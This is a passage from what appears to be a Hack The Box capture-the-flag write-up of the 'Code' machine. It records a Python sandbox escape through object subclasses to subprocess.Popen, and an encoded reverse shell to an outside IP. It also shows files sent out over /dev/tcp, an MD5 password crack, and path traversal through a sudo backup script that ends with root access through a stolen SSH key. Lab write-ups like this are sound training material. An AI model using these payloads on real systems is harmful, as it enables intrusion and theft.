dGNoJz4sIDxjbGFzcyAnc3FsYWxjaGVteS5zcWwuY2FjaGVfa2V5Lkhhc0NhY2hlS2V5Jz4sIDxjbGFzcyAnc3FsYWxjaGVteS5zcWwub3BlcmF0b3JzLk9wZXJhdG9ycyc%2BLCA8Y2xhc3MgJ3NxbGFsY2hlbXkuc3FsLmJhc2UuSW1tdXRhYmxlJz4sIDxjbGFzcyAnc3FsYWxjaGVteS5zcWwuYmFzZS5EaWFsZWN0S1dBcmdzJz4sIDxjbGFzcyAnc3FsYWxjaGVteS5zcWwuYmFzZS5Db21waWxlU3RhdGUnPiwgPGNsYXNzICdzcWxhbGNoZW15LnNxbC5iYXNlLk9wdGlvbnMnPiwgPGNsYXNzICdzcWxhbGNoZW15LnNxbC5jb2VyY2lvbnMuUm9sZUltcGwnPiwgPGNsYXNzICdzcWxhbGNoZW15LnNxbC5jb2VyY2lvbnMuX0RlYW5ub3RhdGUnPiwgPGNsYXNzICdzcWxhbGNoZW15LnNxbC5jb2VyY2lvbnMuX1N0cmluZ09ubHknPiwgPGNsYXNzICdzcWxhbGNoZW15LnNxbC50eXBlX2FwaS5UeXBlRW5naW5lTWl4aW4nPiwgPGNsYXNzICdzcWxhbGNoZW15LnNxbC5zcWx0eXBlcy5fUmVuZGVySVNPODYwMU5vVCc%2BLCA8Y2xhc3MgJ3NxbGFsY2hlbXkuc3FsLnNlbGVjdGFibGUuSGFzUHJlZml4ZXMnPiwgPGNsYXNzICdzcWxhbGNoZW15LnNxbC5zZWxlY3RhYmxlLkhhc1N1ZmZpeGVzJz4sIDxjbGFzcyAnc3FsYWxjaGVteS5zcWwuc2VsZWN0YWJsZS5IYXNIaW50cyc%2BLCA8Y2xhc3MgJ3NxbGFsY2hlbXkuc3FsLnNlbGVjdGFibGUuTm9Jbml0Jz4sIDxjbGFzcyAnc3FsYWxjaGVteS5zcWwuc2VsZWN0YWJsZS5fU2VsZWN0RnJvbUVsZW1lbnRzJz4sIDxjbGFzcyAnc3FsYWxjaGVteS5zcWwuc2NoZW1hLkhhc0NvbmRpdGlvbmFsRERMJz4sIDxjbGFzcyAnc3FsYWxjaGVteS5zcWwuc2NoZW1hLklkZW50aXR5T3B0aW9ucyc%2BLCA8Y2xhc3MgJ3NxbGFsY2hlbXkuc3FsLnNjaGVtYS5Db2x1bW5Db2xsZWN0aW9uTWl4aW4nPiwgPGNsYXNzICdzcWxhbGNoZW15LnNxbC51dGlsLl9yZXByX2Jhc2UnPiwgPGNsYXNzICdzcWxhbGNoZW15LnNxbC51dGlsLkNvbHVtbkFkYXB0ZXIuX0luY2x1ZGVFeGNsdWRlTWFwcGluZyc%2BLCA8Y2xhc3MgJ3NxbGFsY2hlbXkuc3FsLmRtbC5ETUxXaGVyZUJhc2UnPiwgPGNsYXNzICdzcWxhbGNoZW15LnNxbC5mdW5jdGlvbnMuX0Z1bmN0aW9uR2VuZXJhdG9yJz4sIDxjbGFzcyAnc3FsYWxjaGVteS5zcWwuY29tcGlsZXIuQ29tcGlsZWQnPiwgPGNsYXNzICdzcWxhbGNoZW15LnNxbC5jb21waWxlci5JZGVudGlmaWVyUHJlcGFyZXInPiwgPGNsYXNzICdzcWxhbGNoZW15LnNxbC5sYW1iZGFzLkFuYWx5emVkQ29kZSc%2BLCA8Y2xhc3MgJ3NxbGFsY2hlbXkuc3FsLmxhbWJkYXMuTm9uQW5hbHl6ZWRGdW5jdGlvbic%2BLCA8Y2xhc3MgJ3NxbGFsY2hlbXkuc3FsLmxhbWJkYXMuQW5hbHl6ZWRGdW5jdGlvbic%2BLCA8Y2xhc3MgJ3NxbGFsY2hlbXkuc3FsLm5hbWluZy5Db252ZW50aW9uRGljdCc%2BLCA8Y2xhc3MgJ3NxbGFsY2hlbXkuZW5naW5lLmludGVyZmFjZXMuQ3JlYXRlRW5naW5lUGx1Z2luJz4sIDxjbGFzcyAnc3FsYWxjaGVteS5lbmdpbmUuaW50ZXJmYWNlcy5FeGVjdXRpb25Db250ZXh0Jz4sIDxjbGFzcyAnc3FsYWxjaGVteS5lbmdpbmUuaW50ZXJmYWNlcy5FeGNlcHRpb25Db250ZXh0Jz4sIDxjbGFzcyAnc3FsYWxjaGVteS5lbmdpbmUuaW50ZXJmYWNlcy5BZGFwdGVkQ29ubmVjdGlvbic%2BLCA8Y2xhc3MgJ3NxbGFsY2hlbXkuZW5naW5lLnV0aWwuVHJhbnNhY3Rpb25hbENvbnRleHQnPiwgPGNsYXNzICdzcWxhbGNoZW15LmVuZ2luZS5tb2NrLk1vY2tDb25uZWN0aW9uJz4sIDxjbGFzcyAnc3FsYWxjaGVteS5lbmdpbmUucmVzdWx0LlJlc3VsdE1ldGFEYXRhJz4sIDxjbGFzcyAnc3FsYWxjaGVteS5lbmdpbmUucmVzdWx0Ll9XaXRoS2V5cyc%2BLCA8Y2xhc3MgJ3NxbGFsY2hlbXkuZW5naW5lLmN1cnNvci5SZXN1bHRGZXRjaFN0cmF0ZWd5Jz4sIDxjbGFzcyAnc3FsYWxjaGVteS5lbmdpbmUucmVmbGVjdGlvbi5SZWZsZWN0aW9uRGVmYXVsdHMnPiwgPGNsYXNzICdzcWxhbGNoZW15LmVuZ2luZS5yZWZsZWN0aW9uLl9SZWZsZWN0aW9uSW5mbyc%2BLCA8Y2xhc3MgJ3NxbGFsY2hlbXkub3JtLmJhc2UuSW5zcGVjdGlvbkF0dHInPiwgPGNsYXNzICdzcWxhbGNoZW15Lm9ybS5jb2xsZWN0aW9ucy5jb2xsZWN0aW9uJz4sIDxjbGFzcyAnc3FsYWxjaGVteS5vcm0uY29sbGVjdGlvbnMuQ29sbGVjdGlvbkFkYXB0ZXInPiwgPGNsYXNzICdzcWxhbGNoZW15Lm9ybS5tYXBwZWRfY29sbGVjdGlvbi4

This is the cyberchef URL, we can see that subprocess.Popen is on line 318,

AND WE GOT SUCESSFULL RCE.

Payload:

print(''.__class__.mro()[1].__subclasses__()[317]('id',shell=True,stdout=-1).communicate()[0].strip())

# took 317 in place of 318 because of 0 indexing.

User shell

Payload:

print(''.__class__.mro()[1].__subclasses__()[317]('echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMDUvOTAwMSAwPiYxJwo= | base64 -d | bash',shell=True,stdout=-1).communicate()[0].strip())

User (app-production -> martin)

There's a database file in instance/directory. Let's take that to our local machine. I'll use nc & cat command for it.

#Host machine -> 
cat instance/database.db > /dev/tcp/10.10.14.105/9002

#Local machine -> 
nc -nvlp 9002 > database.db

There are 2 tables in the current database. The usertable has hashes.

sqlite> .tables
code  user
sqlite> .schema user
CREATE TABLE user (
        id INTEGER NOT NULL,
        username VARCHAR(80) NOT NULL,
        password VARCHAR(80) NOT NULL,
        PRIMARY KEY (id),
        UNIQUE (username)
);

sqlite> select username, password from user;                                                                                                                                                                      
development|759b74ce43947f5f4c91aeddc3e5bad3
martin|3de6f30c4a09c27fc71932bfc68474be

If we gave hash on crackstation.netit will crack the hash for us.

3de6f30c4a09c27fc71932bfc68474be	md5	nafeelswordsmaster

Let's ssh. & done

martin@code:~$ id
uid=1000(martin) gid=1000(martin) groups=1000(martin)

Root shell.

martin@code:~$ sudo -l
Matching Defaults entries for martin on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User martin may run the following commands on localhost:
    (ALL : ALL) NOPASSWD: /usr/bin/backy.sh

Script 

martin@code:~$ cat /usr/bin/backy.sh
#!/bin/bash

if [[ $# -ne 1 ]]; then
    /usr/bin/echo "Usage: $0 <task.json>"
    exit 1
fi

json_file="$1"

if [[ ! -f "$json_file" ]]; then
    /usr/bin/echo "Error: File '$json_file' not found."
    exit 1
fi

allowed_paths=("/var/" "/home/")

updated_json=$(/usr/bin/jq '.directories_to_archive |= map(gsub("\\.\\./"; ""))' "$json_file")

/usr/bin/echo "$updated_json" > "$json_file"

directories_to_archive=$(/usr/bin/echo "$updated_json" | /usr/bin/jq -r '.directories_to_archive[]')

is_allowed_path() {
    local path="$1"
    for allowed_path in "${allowed_paths[@]}"; do
        if [[ "$path" == $allowed_path* ]]; then
            return 0
        fi
    done
    return 1
}

for dir in $directories_to_archive; do
    if ! is_allowed_path "$dir"; then
        /usr/bin/echo "Error: $dir is not allowed. Only directories under /var/ and /home/ are allowed."
        exit 1
    fi
done

/usr/bin/backy "$json_file"

Script Flow

  1. We have to give the progm a .json file

  2. It'll check if the filetype is file (-f $json_file)

  3. in updated_jsonvariable, the directories to be archived variable will be updated removing all the ../using gsub. [ HERE EXSIT THE CODE MISTAKE ]

  4. directories_to_archivevariable stores the directory name that we'll need to archive.

  5. is_allowed_path()function will check if the path we mentioned in the directories_to_archive starts with either /homeor /var [ CODE MISTAKE 2 ]

  6. If the function returns 0, backy binary will be executed.

Attack

So coming back to point 3,

it's removing ../and replacing it with '' . But what if I have ....//It will replace ../out from the 4 dots and the slash, eventually after removal, i have ../

Also talking about point 5,

if [[ "$path" == $allowed_path* ]]; then

The leading * includes all directories inside /home or /var (intended) but due to that, we can misuse file path. (yeah linux is funny) 

{
        "destination": "/home/martin/backups/",
        "multiprocessing": true,
        "verbose_log": true,
        "directories_to_archive": [
                "/home/martin/....//....//....//....//root..//"
        ]
}

This is my task.jsonfile.

And done, we successfully backed up the /rootfolder.

# host machine command
cat backups/code_home_martin_.._.._.._.._root_2025_March.tar.bz2 > /dev/tcp/10.10.14.105/9002

# local machine command
nc -nvlp 9002 > file.tar.bz2

I moved the file to my localhost since the server has some cleanup script running which deletes all the files after certain amount of time.

heap@dragon:~/stuff/HTB/code/ext$ tar -xjf file.tar.bz2

heap@dragon:~/stuff/HTB/code/ext$ ls
file.tar.bz2  root

heap@dragon:~/stuff/HTB/code/ext$ cd root

heap@dragon:~/stuff/HTB/code/ext/root$ ls
root.txt  scripts

heap@dragon:~/stuff/HTB/code/ext/root$ cat root.txt
<SNIP>

Root shell

Since we have the root folder with us, we can see it has the private key for ssh too, after changing the permission to 400, we can ssh into the box.

heap@dragon:~/stuff/HTB/code/ext/root/.ssh$ ssh root@10.129.33.86 -i id_rsa

<SNIP>

root@code:~# id
uid=0(root) gid=0(root) groups=0(root)
root@code:~#

________________heapbytes' still pwning

PreviousEasyNextPermX

Last updated